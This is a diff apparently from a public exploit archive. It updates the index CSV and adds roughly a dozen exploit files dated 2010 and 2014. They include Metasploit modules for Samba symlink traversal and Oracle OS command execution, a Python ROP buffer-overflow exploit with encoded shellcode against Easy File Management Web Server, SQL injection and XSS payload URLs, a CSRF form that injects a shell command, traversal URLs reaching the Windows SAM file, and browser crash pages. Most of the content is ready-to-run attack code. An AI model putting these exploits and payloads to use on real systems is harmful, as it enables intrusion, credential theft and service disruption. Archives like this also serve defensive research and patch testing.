Updated 06_03_2014

files.csv

@@ -11029,7 +11029,7 @@ id,file,description,date,author,platform,type,port
 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash Vulnerability",2010-04-06,"Jobert Abma",linux,dos,0
 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0
 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX [prodid] SQL Injection Vulnerability",2010-04-06,AntiSecurity,php,webapps,0
-12098,platforms/php/webapps/12098.txt,"Wordpress Plugin NextGEN Gallery - XSS Vulnerability",2010-04-06,"Alejandro Rodriguez",php,webapps,0
+12098,platforms/php/webapps/12098.txt,"Wordpress Plugin NextGEN Gallery <= 1.5.1 - XSS Vulnerability",2010-04-06,"Alejandro Rodriguez",php,webapps,0
 12100,platforms/asp/webapps/12100.txt,"Espinas CMS SQL Injection Vulnerability",2010-04-07,"Pouya Daneshmand",asp,webapps,0
 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 LFI Vulnerability",2010-04-07,"Angela Zhang",php,webapps,0
@@ -29951,7 +29951,7 @@ id,file,description,date,author,platform,type,port
 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0
 33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
 33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0
-33251,platforms/multiple/local/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,local,0
+33251,platforms/multiple/dos/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,dos,0
 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0
 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0
 33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0
@@ -30266,3 +30266,19 @@ id,file,description,date,author,platform,type,port
 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
 33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
 33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0
+33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager 5.1.3 and Prior Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0
+33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0
+33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0
+33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability",2010-02-04,kingcope,linux,remote,0
+33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability (2)",2010-02-04,kingcope,linux,remote,0
+33600,platforms/multiple/remote/33600.rb,"Oracle 10g Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
+33601,platforms/multiple/remote/33601.rb,"Oracle 11g Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
+33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0
+33603,platforms/php/webapps/33603.html,"LANDesk Management Gateway 4.x Multiple Security Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps,0
+33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 '__get_argv()' and '__get_compat_argv()' Local Memory Corruption Vulnerabilities",2010-02-05,"Josh Stone",linux,local,0
+33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS 'i' Parameter Local File Include Vulnerability",2010-02-05,Wireghoul,php,webapps,0
+33606,platforms/php/webapps/33606.txt,"ASCET Interactive Huski Retail Multiple SQL Injection Vulnerabilities",2010-02-05,Wireghoul,php,webapps,0
+33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",multiple,dos,0
+33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0
+33610,platforms/windows/remote/33610.py,"Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
+33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0

platforms/jsp/webapps/33596.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38094/info
+
+KnowGate hipergate is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+KnowGate hipergate 4.0.12 is vulnerable; other versions may also be affected. 
+
+http://www.example.com:8080/hipergate/common/errmsg.jsp?title=%3Cscript%3Ealert%28%22titleXSS%22%29;
+%3C/script%3E&desc=%3Cscript%3Ealert%28%22descXSS%22%29;%3C/script%3E&resume=_back 

platforms/linux/local/33604.sh

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/38120/info
+
+SystemTap is prone to multiple local memory-corruption vulnerabilities.
+
+An attacker may exploit these issues to execute arbitrary code with SYSTEM privileges. Failed exploit attempts will result in a denial of service.
+
+SystemTap 1.1 is vulnerable; other versions may also be affected. 
+
+#!/bin/bash
+while [ "0" = "0" ] ; do
+HOME=1
+/bin/echo /usr/src/kernels/2.6.18-128.el5-PAE-i686/include/*/*
+
+cat /proc/slabinfo
+done

platforms/linux/remote/33598.rb

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/38111/info
+
+Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.
+
+To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.
+
+NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.
+
+##
+# $Id: samba_symlink_traversal.rb 8369 2010-02-05 06:38:24Z hdm $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::DCERPC
+	include Msf::Exploit::Remote::SMB
+	include Msf::Auxiliary::Report
+
+	# Aliases for common classes
+	SIMPLE = Rex::Proto::SMB::SimpleClient
+	XCEPT  = Rex::Proto::SMB::Exceptions
+	CONST  = Rex::Proto::SMB::Constants
+
+
+	def initialize
+		super(
+			'Name'        => 'Samba Symlink Directory Traversal',
+			'Version'     => '$Revision: 8369 $',
+			'Description' => %Q{
+				This module exploits a directory traversal flaw in the Samba
+			CIFS server. To exploit this flaw, a writeable share must be specified.
+			The newly created directory will link to the root filesystem.
+			},
+			'Author'      =>
+				[
+					'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
+					'hdm'    # metasploit module
+				],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options([
+			OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),
+			OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
+		], self.class)
+
+	end
+
+
+	def run
+		print_status("Connecting to the server...")
+		connect()
+		smb_login()
+
+		print_status("Trying to mount writeable share #{datastore['SMBSHARE']}...")
+		self.simple.connect(datastore['SMBSHARE'])
+
+		print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
+		self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)
+
+		print_status("Now access the following share to browse the root filesystem:")
+		print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
+		print_line("")
+	end
+
+end

platforms/linux/remote/33599.txt

@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/38111/info
+ 
+Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
+ 
+Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.
+ 
+To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.
+ 
+NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.
+ 
+smbclient patch (exploit):
+
+samba-3.4.5/source3/client/client.c
+/****************************************************************************
+ UNIX symlink.
+****************************************************************************/
+
+static int cmd_symlink(void)
+{
+        TALLOC_CTX *ctx = talloc_tos();
+        char *oldname = NULL;
+        char *newname = NULL;
+        char *buf = NULL;
+        char *buf2 = NULL;
+        char *targetname = NULL;
+        struct cli_state *targetcli;
+
+        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
+            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
+                d_printf("symlink <oldname> <newname>\n");
+                return 1;
+        }
+        oldname = talloc_asprintf(ctx,
+                        "%s", // << HERE modified
+                        buf);
+        if (!oldname) {
+                return 1;
+        }
+        newname = talloc_asprintf(ctx,
+                        "%s", // << HERE modified
+                        buf2);
+        if (!newname) {
+                return 1;
+        }
+/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
+      oldname = talloc_asprintf(ctx,
+                        "%s%s", // < modified (see above)
+                        client_get_cur_dir(), // < removed (see above)
+                        buf);
+        if (!oldname) {
+                return 1;
+        }
+        newname = talloc_asprintf(ctx,
+                        "%s%s", // < modified (see above)
+                        client_get_cur_dir(), // < removed (see above)
+                        buf2);
+        if (!newname) {
+                return 1;
+        }
+----------------------------------------------*/
+
+        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
+                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
+                return 1;
+
+        }
+
+        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
+                d_printf("Server doesn't support UNIX CIFS calls.\n");
+                return 1;
+        }
+
+        if (!cli_unix_symlink(targetcli, targetname, newname)) {
+                d_printf("%s symlinking files (%s -> %s)\n",
+                        cli_errstr(targetcli), newname, targetname);
+                return 1;
+        }
+
+        return 0;
+}
+
+// Cheers,
+// kcope 

platforms/multiple/dos/33607.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38132/info
+
+Mozilla Firefox and SeaMonkey are prone to a remote denial-of-service vulnerability.
+
+Successful exploits may allow an attacker to crash the affected browser, resulting in a denial-of-service condition. Given the nature of this issue, memory corruption or code execution might be possible, but has not been confirmed.
+
+The issue affects Firefox 3.6.7 and SeaMonkey 2.0.1; other versions may also be affected.
+
+<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> 

platforms/multiple/remote/33600.rb

@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/38115/info
+
+Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages.
+
+The attacker can exploit these issues to escalate their privileges to DBA or execute arbitrary operating system commands with SYSTEM privileges, leading to a complete compromise of an affected computer.
+
+These vulnerabilities affect Oracle Database 11gR2. One of the issues also affects Oracle Database 10gR2. 
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::ORACLE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
+			'Description'    => %q{
+				This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
+				any user with create session privilege to grant themselves java IO privileges.
+				Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
+
+			},
+			'Author'         => [ 'sid[at]notsosecure.com' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 8822 $',
+			'References'     =>
+				[
+					[ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
+					[ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
+				],
+			'DisclosureDate' => 'Feb 1 2010'))
+
+			register_options(
+				[
+					OptString.new('CMD', [ false, 'CMD to execute.',  "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
+				], self.class)
+	end
+
+	def run
+		name = Rex::Text.rand_text_alpha(rand(10) + 1)
+
+
+		package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
+
+		package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
+
+
+		package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
+
+
+
+		os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"
+
+		begin
+			print_status("Attempting to grant JAVA IO Privileges")
+			prepare_exec(package1)
+			prepare_exec(package2)
+			prepare_exec(package3)
+			print_status("Attempting to execute OS Code")
+			prepare_exec(os_code)
+		rescue => e
+			print_status("Error: #{e.class} #{e}")
+		end
+	end
+
+end
+

platforms/multiple/remote/33601.rb

@@ -0,0 +1,67 @@
+source: http://www.securityfocus.com/bid/38115/info
+ 
+Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages.
+ 
+The attacker can exploit these issues to escalate their privileges to DBA or execute arbitrary operating system commands with SYSTEM privileges, leading to a complete compromise of an affected computer.
+ 
+These vulnerabilities affect Oracle Database 11gR2. One of the issues also affects Oracle Database 10gR2. 
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::ORACLE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution',
+			'Description'    => %q{
+				This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
+				any user with create session privilege to grant themselves java IO privileges.
+				Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
+
+			},
+			'Author'         => [ 'sid[at]notsosecure.com' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 8822 $',
+			'References'     =>
+				[
+					[ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
+					[ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
+				],
+			'DisclosureDate' => 'Feb 1 2010'))
+
+			register_options(
+				[
+					OptString.new('CMD', [ false, 'CMD to execute.',  "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
+				], self.class)
+	end
+
+	def run
+		name = Rex::Text.rand_text_alpha(rand(10) + 1)
+
+
+		package = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
+		os_code = "select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe /c  #{datastore['CMD']}')from dual"
+
+
+
+		begin
+			print_status("Attempting to grant JAVA IO Privileges")
+			prepare_exec(package)
+			print_status("Attempting to execute OS Code")
+			prepare_exec(os_code)
+		rescue => e
+			print_status("Error: #{e.class} #{e}")
+		end
+	end
+
+end
+

platforms/php/webapps/33595.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38090/info
+
+Interspire Knowledge Manager is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to obtain sensitive information, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Interspire Knowledge Manager 5.1.3 and prior versions are vulnerable.
+
+http://www.example.com/admin/de/colormenu.php?sp=f";[xss];a=" 

platforms/php/webapps/33597.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38097/info
+
+Data 1 Systems UltraBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Data 1 Systems UltraBB 1.17 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/view_post.php?post_id==">><script></script><marquee><h1>XSS By Fatal Error</h1></marquee> 

platforms/php/webapps/33602.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38116/info
+
+evalSMSI is prone to multiple vulnerabilities, including an authentication-bypass issue, an SQL-Injection issue, and an HTML-Injection issue.
+
+Attackers can exploit these issues to gain administrative access to the affected application, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
+
+Versions prior to evalSMSI 2.2.00 are vulnerable. 
+
+http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
+
+http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 

platforms/php/webapps/33603.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38119/info
+
+LANDesk Management Gateway is prone to a cross-site request-forgery vulnerability and a cross-site scripting vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to alter the settings on affected devices. This may lead to further network-based attacks, including command-injection attacks to the device's underlying operating system, which can lead to a complete compromise of a vulnerable device.
+
+The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. 
+
+<html> <head><title>LANDesk PoC</title></head> <body> <form method="post" action="https://www.example.com/gsb/datetime.php"> <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED"> <input type="text" name="backupRestoreFormSubmitted" value="b"> <input type="submit" value="Attack!"> </form> </body> </html> 

platforms/php/webapps/33605.php

@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/38126/info
+
+Huski CMS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible. 
+
+<?php
+header ('Content-Type: text/html; charset=utf-8');
+// Data Includes
+include_once "PHPLib/db_mysql.inc";
+include_once "Data/dbConnection.class.php";
+include_once "Data/dbConfig.class.php";
+include_once "Data/dataAdapter.class.php";
+include_once "Quicksite/Core/domxml.class.php";
+
+
+// Quicksite Core Includes
+include_once "Quicksite/Core/all.inc.php";
+
+// Configuration
+include_once "Quicksite/db.config.php";
+include_once "inc/vars.config.php";
+
+// Initialise the Site
+$site = new Site($_VARS['site']);
+print_r($_SESSION['login']);
+// Initialise the Page
+$page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));
+
+// Load plugin sources
+$page->loadPluginSources();
+
+// Create the Page
+$page->createPage();
+
+echo $page->Result;
+?>

platforms/php/webapps/33606.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38129/info
+
+Huski Retail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/?_action=editProducts&categoryID=[SQLI]
+http://www.example.com/?_action=showProducts&categoryID=[SQLI]&id=shop
+http://www.example.com/?_action=showProductDetails&productID=[SQLI]&categoryID=1310&id=shop
+http://www.example.com/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop 

platforms/windows/dos/33608.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38133/info
+
+Apple Safari is prone to a remote denial-of-service vulnerability.
+
+Successful exploits may allow an attacker to crash the affected browser, resulting in a denial-of-service condition. Given the nature of this issue, memory corruption or code execution might be possible, but has not been confirmed.
+
+The issue affects Safari 4.0.4; other versions may also be affected. 
+
+<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> 

platforms/windows/remote/33610.py

@@ -0,0 +1,101 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow (ROP)
+# Version:       5.3
+# Date:          2014-05-31
+# Author:        Julien Ahrens (@MrTuxracer)
+# Homepage:      http://www.rcesecurity.com
+# Software Link: http://www.efssoft.com/
+# Tested on:     WinXP-GER, Win7x64-GER, Win8-EN, Win8x64-GER
+#
+# Credits for vulnerability discovery:
+# superkojiman (http://www.exploit-db.com/exploits/33453/)
+#
+# Howto / Notes:
+# This scripts exploits the buffer overflow vulnerability caused by an oversized UserID - string as
+# discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not 
+# brute force the address of the overwritten stackpart, instead it uses code from its own 
+# .text segment to achieve reliable code execution.
+
+from struct import pack
+import socket,sys
+import os
+ 
+host="192.168.0.1"
+port=80
+ 
+junk0 = "\x90" * 80
+
+# Instead of bruteforcing the stack address, let's take an address
+# from the .text segment, which is near to the stackpivot instruction:
+# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] 
+# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
+# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
+call_edx=pack('<L',0x1001D8C8) 
+
+junk1="\x90" * 280
+ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
+
+# Since 0x00 would break the exploit, the 0x00457452 (JMP ESP [fmws.exe]) needs to be crafted on the stack
+crafted_jmp_esp=pack('<L',0xA445ABCF)
+
+test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
+
+kungfu=pack('<L',0x10022aac)  # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
+kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
+
+nopsled="\x90" * 20
+
+# windows/exec CMD=calc.exe 
+# Encoder: x86/shikata_ga_nai
+# powered by Metasploit 
+# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
+
+shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
+"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
+"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
+"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
+"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
+"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
+"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
+"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
+"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
+"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
+"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
+"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
+"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
+"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
+"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
+"\xa5\x59\x50")
+
+payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
+
+buf="GET /vfolder.ghp HTTP/1.1\r\n"
+buf+="User-Agent: Mozilla/4.0\r\n"
+buf+="Host:" + host + ":" + str(port) + "\r\n"
+buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buf+="Accept-Language: en-us\r\n"
+buf+="Accept-Encoding: gzip, deflate\r\n"
+buf+="Referer: http://" + host + "/\r\n"
+buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
+buf+="Conection: Keep-Alive\r\n\r\n"
+
+
+print "[*] Connecting to Host " + host + "..."
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+    connect=s.connect((host, port))
+    print "[*] Connected to " + host + "!"
+except:
+    print "[!] " + host + " didn't respond\n"
+    sys.exit(0)
+    
+print "[*] Sending malformed request..."
+s.send(buf)
+
+print "[!] Exploit has been sent!\n"
+s.close()

platforms/windows/remote/33611.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38141/info
+
+Gefest Web Home Server is prone to a remote directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Gefest Web Home Server 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
+http://www.example.com/\../\../\../WINDOWS\SYSTEM32\config\sam
+http://www.example.com/\../\../\../WINDOWS\SYSTEM32
+http://www.example.com/\../\../\../boot.ini
+